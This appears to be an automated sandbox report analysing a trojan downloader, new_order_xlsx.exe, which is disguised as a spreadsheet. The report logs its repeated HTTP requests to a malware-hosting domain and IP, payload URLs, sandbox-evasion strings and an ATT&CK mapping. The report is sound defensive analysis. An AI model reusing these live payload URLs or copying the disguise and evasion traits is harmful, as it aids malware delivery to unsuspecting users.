              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: new_order_xlsx.exe, 00000000.00000002.632555701.000000000079A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>memstr_7817c608-a

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: new_order_xlsx.exe
              Source: new_order_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: new_order_xlsx.exe, 00000000.00000003.230488014.0000000002418000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.230388318.00000000023AC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.230629064.00000000023E1000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000002.633865481.0000000003629000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.230353890.00000000035EA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.230689886.00000000023E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.230595125.0000000002418000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.230526584.00000000023E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.230455265.00000000023E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.231207375.00000000023E5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.231339439.00000000023E5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.230570843.00000000023E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.230792106.0000000002406000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.230295494.0000000003514000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.231068363.00000000023E4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: C:\Users\user\Desktop\new_order_xlsx.exeSection loaded: archiveint.dllJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeSection loaded: system.dllJump to behavior
              Source: new_order_xlsx.exeReversingLabs: Detection: 78%
              Source: C:\Users\user\Desktop\new_order_xlsx.exeFile read: C:\Users\user\Desktop\new_order_xlsx.exeJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: classification engineClassification label: mal92.troj.winEXE@1/0@18/1
              Source: C:\Users\user\Desktop\new_order_xlsx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: new_order_xlsx.exeStatic file information: File size 1516544 > 1048576

              Data Obfuscation

              barindex
              Yara detected DBatLoader
              Source: Yara matchFile source: new_order_xlsx.exe, type: SAMPLE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.23e52ec.123.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.23e5580.125.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.23e2b58.117.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.new_order_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.23e502c.121.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.new_order_xlsx.exe.3600000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.23e1148.115.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.23e0e6c.114.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.23e1148.116.unpack, type: UNPACKEDPE
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F3D06 push ss; retf 0_3_034F3D0B
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F3D18 push eax; retf 0_3_034F3D1B
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F3110 push eax; ret 0_3_034F3111
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F1DD8 push edi; ret 0_3_034F1DE3
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F2227 push esp; ret 0_3_034F223C
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F3CD8 push esp; retf 0014h0_3_034F3CDB
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F3D06 push ss; retf 0_3_034F3D0B
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F3D18 push eax; retf 0_3_034F3D1B
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F3110 push eax; ret 0_3_034F3111
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F1DD8 push edi; ret 0_3_034F1DE3
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F2227 push esp; ret 0_3_034F223C
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F3CD8 push esp; retf 0014h0_3_034F3CDB
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_0355CF54 push eax; ret 0_3_0355CF90
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exe TID: 6872Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exe TID: 6872Thread sleep time: -30000s >= -30000sJump to behavior
              Source: new_order_xlsx.exe, 00000000.00000003.339620607.000000000083D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: new_order_xlsx.exe, 00000000.00000003.339620607.0000000000823000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.632555701.000000000082A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG
              Source: new_order_xlsx.exe, 00000000.00000002.632555701.00000000007F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Virtualization/Sandbox Evasion              		1
              Input Capture              		1
              Security Software Discovery              		Remote Services1
              Input Capture              		Exfiltration Over Other Network Medium1
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              DLL Side-Loading              		LSASS Memory1
              Virtualization/Sandbox Evasion              		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
              Non-Application Layer Protocol              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information              		Security Account Manager1
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration114
              Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
              Remote System Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer3
              Ingress Tool Transfer              		SIM Card SwapCarrier Billing Fraud

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              new_order_xlsx.exe79%ReversingLabsWin32.Trojan.Leonem
              new_order_xlsx.exe100%AviraTR/AD.DelfDownloader.evrog
              new_order_xlsx.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://://t.exet.exe0%Avira URL Cloudsafe
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfZ100%Avira URL Cloudmalware
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfy100%Avira URL Cloudmalware
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf~()100%Avira URL Cloudmalware
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfk100%Avira URL Cloudmalware
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf100%Avira URL Cloudmalware
              https://balkancelikdovme.com/L100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              balkancelikdovme.com
              		185.181.116.217
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwftrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://balkancelikdovme.com/Lnew_order_xlsx.exe, 00000000.00000003.339620607.000000000083D000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://balkancelikdovme.com/lnew_order_xlsx.exe, 00000000.00000002.632555701.000000000079A000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.632555701.0000000000851000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.339620607.000000000083D000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://://t.exet.exenew_order_xlsx.exe, 00000000.00000002.632330900.000000000019B000.00000004.00000010.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfZnew_order_xlsx.exe, 00000000.00000003.339620607.0000000000876000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfynew_order_xlsx.exe, 00000000.00000002.632555701.0000000000851000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.pmail.comnew_order_xlsx.exe, 00000000.00000003.230488014.0000000002418000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230388318.00000000023AC000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230629064.00000000023E1000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.633865481.0000000003629000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230353890.00000000035EA000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230689886.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230595125.0000000002418000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230526584.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230455265.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.231207375.00000000023E5000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.231339439.00000000023E5000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230570843.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230792106.0000000002406000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230295494.0000000003514000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.231068363.00000000023E4000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf~()new_order_xlsx.exe, 00000000.00000002.632555701.00000000007F4000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfknew_order_xlsx.exe, 00000000.00000002.632555701.0000000000846000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
